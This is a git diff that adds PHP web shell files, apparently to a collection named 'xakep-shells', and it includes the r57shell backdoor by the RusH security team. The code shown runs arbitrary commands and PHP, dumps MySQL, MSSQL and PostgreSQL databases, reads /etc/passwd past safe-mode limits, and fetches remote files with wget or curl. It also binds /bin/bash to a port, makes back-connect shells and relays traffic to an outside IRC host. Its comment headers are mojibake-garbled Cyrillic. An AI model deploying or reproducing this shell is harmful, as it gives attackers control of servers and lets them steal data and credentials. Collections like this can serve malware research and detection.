+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/r57shell.php.php.txt b/xakep-shells/PHP/r57shell.php.php.txt
new file mode 100644
index 0000000..be948f2
--- /dev/null
+++ b/xakep-shells/PHP/r57shell.php.php.txt
@@ -0,0 +1,640 @@
+<?
+/******************************************************************************************************/
+/*
+/*                                 __________               ___ ___
+/*                                 \______   \__ __  ______/   |   \
+/*                                  |       _/  |  \/  ___/    _    \
+/*                                  |    |   \  |  /\___ \\         /
+/*                                  |____|_  /____//____  >\___|_  /
+/*                                  -======\/==security=\/=team==\/
+/*
+/*
+/*
+/*  r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû  íà ñåðâåðå ÷åðåç áðàóçåð
+/*  Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåðñèÿ: 1.1 îò 14.10.2004 (public 31.12.2004. Happy new year!!!)
+/*
+/*  Âîçìîæíîñòè:
+/*  ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
+/*  ~ âûïîëíåíèå øåëë-êîìàíä
+/*  ~ çàãðóçêà ôàéëîâ íà ñåðâåð
+/*  ~ çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà ñ ïîìîùüþ wget, fetch èëè lynx
+/*  ~ ïîääåðæèâàåò àëèàñû êîìàíä
+/*  ~ âêëþ÷åíû àëèàñû êîìàíä:
+/*    - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
+/*    - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
+/*    - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ service.pwd
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ .bash_history
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ config*
+/*    - ïîèñê íà ñåðâåðå ôàéëîâ .fetchmailrc
+/*    - âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs
+/*  ~ äëÿ àëèàñîâ ïîèñêà äîñòóïíû êàê ïîèñê íà÷èíàÿ ñ êîðíÿ òàê è ïîèñê òîëüêî â òåêóùåé äèðåêòîðèè
+/*  ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
+/*  ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïîìîùüþ Perl èëè Ñ êîäà
+/*  ~ âîçìîæíîñòü äåëàòü back-connect ñ ïîìîùüþ Perl èëè Ñ êîäà
+/*  ~ âûâîä çíà÷åíèé $OSTYPE è sysctl
+/*
+/*  Îòëè÷èÿ îò âåðñèè 1.0c:
+/*  - Äîáàâëåíà ôóíêöèÿ back-connect ñ ïîìîùüþ êîäà íà Perl
+/*  - Äîáàâëåíà ôóíêöèÿ back-connect ñ ïîìîùüþ êîäà íà C
+/*  - Äîáàâëåíà ôóíêöèÿ bind ñ ïîìîùüþ êîäà íà Perl
+/*  - Íåìíîãî îïòèìèçèðîâàë êîä ñîáðàâ ðàñêèäàííûé html â ïåðåìåííûå
+/*  - Â àëèàñû äîáàâëåíû íîâûå êîìàíäû
+/*  - Äîáàâëåí âûâîä sysctl
+/*  - Äîáàâëåí âûâîä ïåðåìåííîé $OSTYPE
+/*  - Äîáàâëåíà âîçìîæíîñòü çàãðóçêè ôàéëîâ ñ óäàëåííîãî ñåðâåðà ñ èñïîëüçîâàíèåì wget, fetch èëè lynx
+/*
+/*  Îòëè÷èÿ îò âåðñèè 1.0 beta:
+/*  - Èñïðàâëåí ìåëêèé íåäî÷åò â ôóíêöèè ïðèâÿçêè ïîðòà.
+/*
+/*  14.10.2004 (c) RusH security team
+/*
+/******************************************************************************************************/
+
+// Àóòåíòèôèêàöèÿ
+
+// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
+// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
+/*
+$name="djskel"; // ëîãèí ïîëüçîâàòåëÿ
+$pass="XYFifA"; // ïàðîëü ïîëüçîâàòåëÿ
+
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"r57shell\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+*/
+error_reporting(0);
+set_time_limit(0);
+set_magic_quotes_runtime(0);
+$err=0;
+
+/*
+Âûáîð ÿçûêà
+$language='ru' - ðóññêèé
+$language='eng' - àíãëèéñêèé
+*/
+$language='ru';
+
+$lang=array(
+           'ru_text1'  => 'Âûïîëíåííàÿ êîìàíäà',
+           'ru_text2'  => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
+           'ru_text3'  => 'Âûïîëíèòü êîìàíäó',
+           'ru_text4'  => 'Ðàáî÷àÿ äèðåêòîðèÿ',
+           'ru_text5'  => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
+           'ru_text6'  => 'Ëîêàëüíûé ôàéë',
+           'ru_text7'  => 'Àëèàñû',
+           'ru_text8'  => 'Âûáåðèòå àëèàñ',
+           'ru_butt1'  => 'Âûïîëíèòü',
+           'ru_butt2'  => 'Çàãðóçèòü',
+           'ru_text9'  => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
+           'ru_text10' => 'Îòêðûòü ïîðò',
+           'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
+           'ru_butt3'  => 'Îòêðûòü',
+           'ru_text12' => 'back-connect',
+           'ru_text13' => 'IP-àäðåñ',
+           'ru_text14' => 'Ïîðò',
+           'ru_butt4'  => 'Âûïîëíèòü',
+           'ru_text15' => 'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
+           'ru_text16' => 'Èñïîëüçîâàòü',
+           'ru_text17' => 'Óäàëåííûé ôàéë',
+           'ru_text18' => 'Ëîêàëüíûé ôàéë',
+           'ru_text19' => 'Exploits',
+           'ru_text20' => 'Èñïîëüçîâàòü',
+           
+           'eng_text1'  => 'Executed command',
+           'eng_text2'  => 'Execute command on server',
+           'eng_text3'  => '&nbsp;Run command',
+           'eng_text4'  => 'Work directory',
+           'eng_text5'  => 'Upload files on server',
+           'eng_text6'  => 'Local file',
+           'eng_text7'  => 'Aliases',
+           'eng_text8'  => 'Select alias',
+           'eng_butt1'  => 'Execute',
+           'eng_butt2'  => 'Upload',
+           'eng_text9'  => 'Bind port to /bin/bash',
+           'eng_text10' => 'Port',
+           'eng_text11' => 'Password for access',
+           'eng_butt3'  => 'Bind',
+           'eng_text12' => 'back-connect',
+           'eng_text13' => 'IP',
+           'eng_text14' => 'Port',
+           'eng_butt4'  => 'Connect',
+           'eng_text15' => 'Upload files from remote server',
+           'eng_text16' => '       With',
+           'eng_text17' => '  Remote file',
+           'eng_text18' => '   Local file',
+           'eng_text19' => 'Exploits',
+           'eng_text20' => '         Use',
+           );
+
+
+
+/*
+Àëèàñû êîìàíä
+Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
+*/
+
+$aliases=array(
+
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
+'find all suid files' => 'find / -type f -perm -04000 -ls',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
+'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
+
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
+'find all sgid files' => 'find / -type f -perm -02000 -ls',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
+'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
+
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
+'find config.inc.php files' => 'find / -type f -name config.inc.php',
+
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
+'find config* files' => 'find / -type f -name "config*"',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
+'find config* files in current dir' => 'find . -type f -name "config*"',
+
